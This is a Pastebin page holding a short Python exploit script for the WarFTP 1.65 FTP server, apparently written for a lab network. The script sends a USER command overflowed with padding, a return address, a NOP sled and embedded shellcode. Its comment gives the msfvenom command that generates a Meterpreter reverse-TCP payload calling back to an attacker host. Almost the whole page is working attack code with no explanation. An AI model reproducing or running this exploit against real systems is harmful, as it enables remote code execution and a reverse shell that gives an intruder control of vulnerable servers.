Advertisement
Spirotot

WarFTP 1.65 Exploit

Jul 23rd, 2012
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.96 KB | None | 0 0
  1. import socket
  2.  
  3. username = "admin"
  4. password = "password"
  5. ipAddress = "192.168.179.134"
  6. port = 21
  7.  
  8. #msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\x0d\x0a\x40\xcc' LHOST=192.168.179.133 LPORT=445 C
  9.  
  10. shellcode = ("\xda\xde\xbe\x99\x80\x95\x3f\xd9\x74\x24\xf4\x5a\x31\xc9" +
  11. "\xb1\x49\x83\xc2\x04\x31\x72\x15\x03\x72\x15\x7b\x75\x69" +
  12. "\xd7\xf2\x76\x92\x28\x64\xfe\x77\x19\xb6\x64\xf3\x08\x06" +
  13. "\xee\x51\xa1\xed\xa2\x41\x32\x83\x6a\x65\xf3\x29\x4d\x48" +
  14. "\x04\x9c\x51\x06\xc6\xbf\x2d\x55\x1b\x1f\x0f\x96\x6e\x5e" +
  15. "\x48\xcb\x81\x32\x01\x87\x30\xa2\x26\xd5\x88\xc3\xe8\x51" +
  16. "\xb0\xbb\x8d\xa6\x45\x71\x8f\xf6\xf6\x0e\xc7\xee\x7d\x48" +
  17. "\xf8\x0f\x51\x8b\xc4\x46\xde\x7f\xbe\x58\x36\x4e\x3f\x6b" +
  18. "\x76\x1c\x7e\x43\x7b\x5d\x46\x64\x64\x28\xbc\x96\x19\x2a" +
  19. "\x07\xe4\xc5\xbf\x9a\x4e\x8d\x67\x7f\x6e\x42\xf1\xf4\x7c" +
  20. "\x2f\x76\x52\x61\xae\x5b\xe8\x9d\x3b\x5a\x3f\x14\x7f\x78" +
  21. "\x9b\x7c\xdb\xe1\xba\xd8\x8a\x1e\xdc\x85\x73\xba\x96\x24" +
  22. "\x67\xbc\xf4\x20\x44\xf2\x06\xb1\xc2\x85\x75\x83\x4d\x3d" +
  23. "\x12\xaf\x06\x9b\xe5\xd0\x3c\x5b\x79\x2f\xbf\x9b\x53\xf4" +
  24. "\xeb\xcb\xcb\xdd\x93\x80\x0b\xe1\x41\x06\x5c\x4d\x3a\xe6" +
  25. "\x0c\x2d\xea\x8e\x46\xa2\xd5\xae\x68\x68\x7e\x44\x92\xfb" +
  26. "\x41\x30\x2f\x7e\x29\x42\x50\x80\x17\xcb\xb6\xe8\x77\x9d" +
  27. "\x61\x85\xee\x84\xfa\x34\xee\x13\x87\x77\x64\x97\x77\x39" +
  28. "\x8d\xd2\x6b\xae\x7d\xa9\xd6\x79\x81\x04\x7c\x86\x17\xa2" +
  29. "\xd7\xd1\x8f\xa8\x0e\x15\x10\x53\x65\x2d\x99\xc1\xc6\x5a" +
  30. "\xe6\x05\xc7\x9a\xb0\x4f\xc7\xf2\x64\x2b\x94\xe7\x6a\xe6" +
  31. "\x88\xbb\xfe\x08\xf9\x68\xa8\x60\x07\x56\x9e\x2f\xf8\xbd" +
  32. "\x1e\x0c\x2f\xf8\xa4\x64\x45\xe8\x64")
  33.  
  34. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  35. connect = s.connect(("192.168.179.134",21))
  36. s.recv(1024)
  37. print "Exploiting..."
  38. s.send("USER " + username + ("\x41" * 480)  + "\x10\xb3\x45\x7e" + ("\x90" * 12) + shellcode)
  39. s.send("PASS " + password + "\r\n") #Don't think I actually need to send this...
  40. s.send("QUIT " + username + "\r\n") #Or this...
  41. s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement